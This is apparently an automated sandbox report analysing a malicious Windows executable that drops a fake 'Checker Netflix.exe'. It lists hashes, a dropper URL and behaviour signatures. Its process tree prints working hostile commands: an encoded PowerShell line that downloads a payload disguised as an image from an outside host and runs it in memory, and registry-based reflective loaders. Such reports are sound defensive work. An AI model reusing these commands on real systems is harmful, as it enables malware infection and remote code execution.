Analysis

  • max time kernel
    4s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    25-05-2022 00:29

General

  • Target

    a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe

  • Size

    1.7MB

  • MD5

    98bfaca19a9ae44bb60fbc3e98e54d09

  • SHA1

    e2f100fc3eb808fe26cdc26327920293c1272cab

  • SHA256

    a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3

  • SHA512

    d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://6.top4top.net/p_13529t6r71.jpg

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
    "C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
      2⤵
        PID:1400
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
          3⤵
            PID:1508
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1636
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
          2⤵
            PID:1516
          • C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
            "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
            2⤵
            • Executes dropped EXE
            PID:964
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
          1⤵
            PID:1588
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
            1⤵
              PID:1772

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

              Filesize

              1.5MB

              MD5

              068068c3cefb4c8d997271897c3173bb

              SHA1

              d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

              SHA256

              23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

              SHA512

              0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

            • C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

              Filesize

              1.5MB

              MD5

              068068c3cefb4c8d997271897c3173bb

              SHA1

              d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

              SHA256

              23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

              SHA512

              0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

              Filesize

              7KB

              MD5

              a65c23a0b2c19e4cc65cae332397d73e

              SHA1

              fa93da00b09e1c68f771f481d725f01a03913ee6

              SHA256

              b96823ee539c570ed2ab01d02aefe7cbd56b31d6ec4379e2971ff6131de5e77a

              SHA512

              c71054f895c30d357ce9a636d957235b46ce6afcd7c6bd23ee2ac7aa08d5493b55cfe077553242be06464fbe7eff6113c37ac764f82b5c5a3913ab2c072c1b64

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

              Filesize

              7KB

              MD5

              a65c23a0b2c19e4cc65cae332397d73e

              SHA1

              fa93da00b09e1c68f771f481d725f01a03913ee6

              SHA256

              b96823ee539c570ed2ab01d02aefe7cbd56b31d6ec4379e2971ff6131de5e77a

              SHA512

              c71054f895c30d357ce9a636d957235b46ce6afcd7c6bd23ee2ac7aa08d5493b55cfe077553242be06464fbe7eff6113c37ac764f82b5c5a3913ab2c072c1b64

            • C:\Users\Admin\AppData\Roaming\l1l1l.vbs

              Filesize

              129KB

              MD5

              c78f607c916f060d6ee3bf391e303acc

              SHA1

              1575998cda060d4a570ba258abc12044601da283

              SHA256

              f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4

              SHA512

              cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b

            • C:\Users\Admin\AppData\Roaming\powershell.js

              Filesize

              2KB

              MD5

              40b65baa1541784dd92f5aa8ae11b0ef

              SHA1

              0772c95f56a025704c01389f2d1108a17fb987cf

              SHA256

              9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699

              SHA512

              fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2

            • C:\Users\Admin\AppData\Roaming\r1r1.vbs

              Filesize

              87KB

              MD5

              0494f414da149631c3d59861865dad37

              SHA1

              c9fd335759efb52e58acb974af27cdecb35d0f10

              SHA256

              a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56

              SHA512

              a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333

            • \Users\Admin\AppData\Roaming\Checker Netflix.exe

              Filesize

              1.5MB

              MD5

              068068c3cefb4c8d997271897c3173bb

              SHA1

              d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

              SHA256

              23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

              SHA512

              0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

            • memory/880-54-0x0000000075711000-0x0000000075713000-memory.dmp

              Filesize

              8KB

            • memory/964-82-0x0000000000500000-0x0000000000506000-memory.dmp

              Filesize

              24KB

            • memory/964-81-0x0000000004EC0000-0x0000000005058000-memory.dmp

              Filesize

              1.6MB

            • memory/964-84-0x00000000003F5000-0x0000000000406000-memory.dmp

              Filesize

              68KB

            • memory/964-76-0x0000000000200000-0x0000000000380000-memory.dmp

              Filesize

              1.5MB

            • memory/964-77-0x00000000001F0000-0x00000000001F6000-memory.dmp

              Filesize

              24KB

            • memory/964-56-0x0000000000000000-mapping.dmp

            • memory/1400-61-0x0000000000000000-mapping.dmp

            • memory/1508-71-0x0000000000000000-mapping.dmp

            • memory/1508-80-0x00000000715A0000-0x0000000071B4B000-memory.dmp

              Filesize

              5.7MB

            • memory/1516-59-0x0000000000000000-mapping.dmp

            • memory/1588-78-0x00000000715A0000-0x0000000071B4B000-memory.dmp

              Filesize

              5.7MB

            • memory/1588-68-0x0000000000000000-mapping.dmp

            • memory/1636-60-0x0000000000000000-mapping.dmp

            • memory/1772-79-0x00000000715A0000-0x0000000071B4B000-memory.dmp

              Filesize

              5.7MB

            • memory/1772-70-0x0000000000000000-mapping.dmp